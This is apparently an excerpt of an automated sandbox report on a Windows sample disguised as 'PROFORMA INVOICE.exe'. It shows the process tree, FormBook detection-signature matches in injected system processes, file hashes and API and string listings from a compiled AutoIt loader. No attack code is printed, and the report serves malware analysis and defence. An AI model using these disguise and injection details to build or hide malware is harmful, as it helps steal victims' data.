Nov 15, 2024 04:24:01.491875887 CET	648	IN	Data Raw: 6b 2d 73 6d 61 6c 6c 2e 70 6e 67 22 3e 3c 2f 64 69 76 3e 46 61 63 65 62 6f 6f 6b 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d Data Ascii: k-small.png"></div>Facebook</a> </li> <li> <a href="https://twitter.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Twitter"> <img src="https://piensasolutions.com/imgs/par

Target ID:	0
Start time:	22:20:50
Start date:	14/11/2024
Path:	C:\Users\user\Desktop\PROFORMA INVOICE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PROFORMA INVOICE.exe"
Imagebase:	0xf60000
File size:	1'216'000 bytes
MD5 hash:	F8E4E80FAA805326B35DDC61AE9780F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:20:51
Start date:	14/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PROFORMA INVOICE.exe"
Imagebase:	0xf10000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1966199008.0000000006E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1958657577.00000000051E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1958001849.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:21:10
Start date:	14/11/2024
Path:	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe"
Imagebase:	0x210000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3556728136.00000000043A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	22:21:12
Start date:	14/11/2024
Path:	C:\Windows\SysWOW64\srdelayed.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\srdelayed.exe"
Imagebase:	0x3a0000
File size:	16'384 bytes
MD5 hash:	B5F31FDCE1BE4171124B9749F9D2C600
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:21:12
Start date:	14/11/2024
Path:	C:\Windows\SysWOW64\ktmutil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\ktmutil.exe"
Imagebase:	0x220000
File size:	15'360 bytes
MD5 hash:	AC387D5962B2FE2BF4D518DD57BA7230
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3555099409.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3556751373.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3556631891.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	22:21:26
Start date:	14/11/2024
Path:	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe"
Imagebase:	0x210000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3559031904.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	22:21:38
Start date:	14/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	8.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	152

Executed Functions

Function 00F8B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d879c77f02fc16194811f379c73547b4cad546afa95150c3187bbd77641b007
Instruction ID: dbb1473a19b07ecaf57311da42452690468f48173cf37b47cbee19c4d0c86260
Opcode Fuzzy Hash: 7d879c77f02fc16194811f379c73547b4cad546afa95150c3187bbd77641b007
Instruction Fuzzy Hash: BC325A75F022288FDB24EF14DC81AE9B7B5FB4A310F1840D9E40AA7A85D7349E81DF52

Function 00F63D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00F63AA3,?), ref: 00F63D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00F63AA3,?), ref: 00F63D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,01021148,01021130,?,?,?,?,00F63AA3,?), ref: 00F63DC8

Part of subcall function 00F66430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F63DEE,01021148,?,?,?,?,?,00F63AA3,?), ref: 00F66471

SetCurrentDirectoryW.KERNEL32(?,?,?,00F63AA3,?), ref: 00F63E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010128F4,00000010), ref: 00FD1CCE
SetCurrentDirectoryW.KERNEL32(?,01021148,?,?,?,?,?,00F63AA3,?), ref: 00FD1D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00FFDAB4,01021148,?,?,?,?,?,00F63AA3,?), ref: 00FD1D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00F63AA3), ref: 00FD1D90

Part of subcall function 00F63E6E: GetSysColorBrush.USER32(0000000F), ref: 00F63E79
Part of subcall function 00F63E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00F63E88
Part of subcall function 00F63E6E: LoadIconW.USER32(00000063), ref: 00F63E9E
Part of subcall function 00F63E6E: LoadIconW.USER32(000000A4), ref: 00F63EB0
Part of subcall function 00F63E6E: LoadIconW.USER32(000000A2), ref: 00F63EC2
Part of subcall function 00F63E6E: RegisterClassExW.USER32(?), ref: 00F63F30

Part of subcall function 00F636B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F636E6
Part of subcall function 00F636B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F63707
Part of subcall function 00F636B8: ShowWindow.USER32(00000000,?,?,?,?,00F63AA3,?), ref: 00F6371B
Part of subcall function 00F636B8: ShowWindow.USER32(00000000,?,?,?,?,00F63AA3,?), ref: 00F63724

Part of subcall function 00F64FFC: _memset.LIBCMT ref: 00F65022
Part of subcall function 00F64FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F650CB

Strings

This is a third-party compiled AutoIt script., xrefs: 00FD1CC8
runas, xrefs: 00FD1D84

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: eebad30db1db210694136abb7147d7bb1d33043b7df1a4a2306d759d2d802ed2
Instruction ID: a7974fd03f73d9adf87bfe0f4ff4481c099a011138ec9c03336c1c8f4e34d4b5
Opcode Fuzzy Hash: eebad30db1db210694136abb7147d7bb1d33043b7df1a4a2306d759d2d802ed2
Instruction Fuzzy Hash: CD510631E04289BECB21ABF0DC42EED7B7AAB15B10F204169F4916A156DA7E4609F731

Function 00F7DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00F7DDEC
GetCurrentProcess.KERNEL32(00000000,00FFDC38,?,?), ref: 00F7DEAC
GetNativeSystemInfo.KERNELBASE(?,00FFDC38,?,?), ref: 00F7DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 00F7DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 00F7DF1F
GetSystemInfo.KERNEL32(?,00FFDC38,?,?), ref: 00F7DF29
GetSystemInfo.KERNEL32(?,00FFDC38,?,?), ref: 00F7DF35

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 51862d4a852df9dd7da731c50239faedff7aab17d3b4e34754f5ea39a8649119
Instruction ID: 8aab0ececf4080d9c4fc29d3c2109d104b5a031367daa67132bb9cc605953fb5
Opcode Fuzzy Hash: 51862d4a852df9dd7da731c50239faedff7aab17d3b4e34754f5ea39a8649119
Instruction Fuzzy Hash: C3619271C0A384CFCF16CF6898C15E97FB56F3A304B5985DAD8499F207C624C909EB66

Function 00F6406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F6449E,?,?,00000000,00000001), ref: 00F6407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F6449E,?,?,00000000,00000001), ref: 00F64092
LoadResource.KERNEL32(?,00000000,?,?,00F6449E,?,?,00000000,00000001,?,?,?,?,?,?,00F641FB), ref: 00FD4F1A
SizeofResource.KERNEL32(?,00000000,?,?,00F6449E,?,?,00000000,00000001,?,?,?,?,?,?,00F641FB), ref: 00FD4F2F
LockResource.KERNEL32(00F6449E,?,?,00F6449E,?,?,00000000,00000001,?,?,?,?,?,?,00F641FB,00000000), ref: 00FD4F42

Strings

SCRIPT, xrefs: 00F64088

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: a5f95bbb5f62c34639ac7e774fe7afad15c9f1720fea02fd67b1a34b3558e314
Instruction ID: 35b6cd2f2ad20feaa67db1807427a0c8047da2666ce0019c2ac715a6211f8732
Opcode Fuzzy Hash: a5f95bbb5f62c34639ac7e774fe7afad15c9f1720fea02fd67b1a34b3558e314
Instruction Fuzzy Hash: 9A11C271600304BFE7219B26DC88F677BB9EBC5B10F14412CF6028A6A0DB71EC40EA30

Function 00FA6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00FD2F49), ref: 00FA6CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00FA6CCA
FindClose.KERNEL32(00000000), ref: 00FA6CDA

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 7e7992f1b9536aed7400a176aace4beb896174b05d38c8db5fd4a8ebad4bbea5
Instruction ID: 7acc194a6fd75b8c8c91a9bd1f35364ee4ad14654669810ce0d52124aeccb4a4
Opcode Fuzzy Hash: 7e7992f1b9536aed7400a176aace4beb896174b05d38c8db5fd4a8ebad4bbea5
Instruction Fuzzy Hash: C6E0D8718104149B92206738EC4D4E9376CDF0633AF100715F871C11D0E774D90065D5

Function 00F73B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 00F74176

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: ffe98e04758ec7efd23430b8f7c565270b359f036fcc7054af95a3177c893b50
Instruction ID: 3a08be66204d269fc3f342a1d672d2ad3b28e899235fc26d7828bc1eeab1e0be
Opcode Fuzzy Hash: ffe98e04758ec7efd23430b8f7c565270b359f036fcc7054af95a3177c893b50
Instruction Fuzzy Hash: 9472A271D04209EFCB24EF94C881AAEB7B6EF44310F14C05BE909AB351D775AE45EB92

Function 00F73200 Relevance: 1.0, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 4f275a603ed6ed6de25ac4e9c11171a7560a432bbf5fbd4b1ab240ad4ee0d7af
Instruction ID: 13b83a194618ac2fd3103b510c83cfb9f362d8e51ca78be1e22c8bb8ce9a2ebd
Opcode Fuzzy Hash: 4f275a603ed6ed6de25ac4e9c11171a7560a432bbf5fbd4b1ab240ad4ee0d7af
Instruction Fuzzy Hash: 9D928B71608341EFD724DF18C480B6AB7E1BF88314F18885EE98A8B352D775ED45EB92

Function 00F6E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F6E959
timeGetTime.WINMM ref: 00F6EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F6ED2E
TranslateMessage.USER32(?), ref: 00F6ED3F
DispatchMessageW.USER32(?), ref: 00F6ED4A
LockWindowUpdate.USER32(00000000), ref: 00F6ED79
DestroyWindow.USER32 ref: 00F6ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F6ED9F
Sleep.KERNEL32(0000000A), ref: 00FD5270
TranslateMessage.USER32(?), ref: 00FD59F7
DispatchMessageW.USER32(?), ref: 00FD5A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FD5A19

Strings

@GUI_CTRLID, xrefs: 00FD5314
@TRAY_ID, xrefs: 00FD54C9
@GUI_CTRLHANDLE, xrefs: 00FD53AC
@GUI_WINHANDLE, xrefs: 00FD5360

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 0f57f02b3ddf69370c3f6f9583b91ec8111571eb6c1ebb4446e41ab8c57d974c
Instruction ID: bb81b5c4b2890e486bafb6d9ededbafea684898bf2941c2a015258f57e9b4634
Opcode Fuzzy Hash: 0f57f02b3ddf69370c3f6f9583b91ec8111571eb6c1ebb4446e41ab8c57d974c
Instruction Fuzzy Hash: A1621971504340CFDB20DF24C885BAA77E5BF84714F18497EF9868B292DB79D848EB52

Function 00F95C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00F95EC3
___createFile.LIBCMT ref: 00F95F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00F95F2D
__dosmaperr.LIBCMT ref: 00F95F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00F95F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00F95F6A
__dosmaperr.LIBCMT ref: 00F95F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00F95F7C
__set_osfhnd.LIBCMT ref: 00F95FAC
__lseeki64_nolock.LIBCMT ref: 00F96016
__close_nolock.LIBCMT ref: 00F9603C
__chsize_nolock.LIBCMT ref: 00F9606C
__lseeki64_nolock.LIBCMT ref: 00F9607E
__lseeki64_nolock.LIBCMT ref: 00F96176
__lseeki64_nolock.LIBCMT ref: 00F9618B
__close_nolock.LIBCMT ref: 00F961EB

Part of subcall function 00F8EA9C: CloseHandle.KERNELBASE(00000000,0100EEF4,00000000,?,00F96041,0100EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F8EAEC
Part of subcall function 00F8EA9C: GetLastError.KERNEL32(?,00F96041,0100EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F8EAF6
Part of subcall function 00F8EA9C: __free_osfhnd.LIBCMT ref: 00F8EB03
Part of subcall function 00F8EA9C: __dosmaperr.LIBCMT ref: 00F8EB25

Part of subcall function 00F87C0E: __getptd_noexit.LIBCMT ref: 00F87C0E

__lseeki64_nolock.LIBCMT ref: 00F9620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00F96342
___createFile.LIBCMT ref: 00F96361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00F9636E
__dosmaperr.LIBCMT ref: 00F96375
__free_osfhnd.LIBCMT ref: 00F96395
__invoke_watson.LIBCMT ref: 00F963C3
__wsopen_helper.LIBCMT ref: 00F963DD

Strings

@, xrefs: 00F95F98

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 7736c9b25b1df805893cad9c37369cc58b10a8b84ce4dc2a118418535fcae6ae
Instruction ID: 2c5b69e7b454f08c932d885ffd3f389161dfb7d4087dd26ba6229673cc752222
Opcode Fuzzy Hash: 7736c9b25b1df805893cad9c37369cc58b10a8b84ce4dc2a118418535fcae6ae
Instruction Fuzzy Hash: 6222F371D046099BFF2AAF68DC85BED7B61EB05724F244229E921DB2E1C33A8D40F751

Function 00FAFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 00FAFA96
_wcschr.LIBCMT ref: 00FAFAA4
_wcscpy.LIBCMT ref: 00FAFABB
_wcscat.LIBCMT ref: 00FAFACA
_wcscat.LIBCMT ref: 00FAFAE8
_wcscpy.LIBCMT ref: 00FAFB09
__wsplitpath.LIBCMT ref: 00FAFBE6
_wcscpy.LIBCMT ref: 00FAFC0B
_wcscpy.LIBCMT ref: 00FAFC1D
_wcscpy.LIBCMT ref: 00FAFC32
_wcscat.LIBCMT ref: 00FAFC47
_wcscat.LIBCMT ref: 00FAFC59
_wcscat.LIBCMT ref: 00FAFC6E

Part of subcall function 00FABFA4: _wcscmp.LIBCMT ref: 00FAC03E
Part of subcall function 00FABFA4: __wsplitpath.LIBCMT ref: 00FAC083
Part of subcall function 00FABFA4: _wcscpy.LIBCMT ref: 00FAC096
Part of subcall function 00FABFA4: _wcscat.LIBCMT ref: 00FAC0A9
Part of subcall function 00FABFA4: __wsplitpath.LIBCMT ref: 00FAC0CE
Part of subcall function 00FABFA4: _wcscat.LIBCMT ref: 00FAC0E4
Part of subcall function 00FABFA4: _wcscat.LIBCMT ref: 00FAC0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00FAFA61

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 83052c7feb3e067c17fe6f83099598a7d8db27c5689fc0040cbc642cfed894bf
Instruction ID: 324f373aa116303e66b67b11885e8060e41d2b0ecd366ec1dffa4a0da1396620
Opcode Fuzzy Hash: 83052c7feb3e067c17fe6f83099598a7d8db27c5689fc0040cbc642cfed894bf
Instruction Fuzzy Hash: 7A9191B25042059FDB10EB50C851E9AB3E8BF95310F044869F9599B291DB39FA48EB92

Function 00F63F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F63F86
RegisterClassExW.USER32(00000030), ref: 00F63FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F63FC1
InitCommonControlsEx.COMCTL32(?), ref: 00F63FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F63FEE
LoadIconW.USER32(000000A9), ref: 00F64004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F64013

Strings

0, xrefs: 00F63F68
+, xrefs: 00F63F6F
AutoIt v3 GUI, xrefs: 00F63FA2
TaskbarCreated, xrefs: 00F63FB6

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
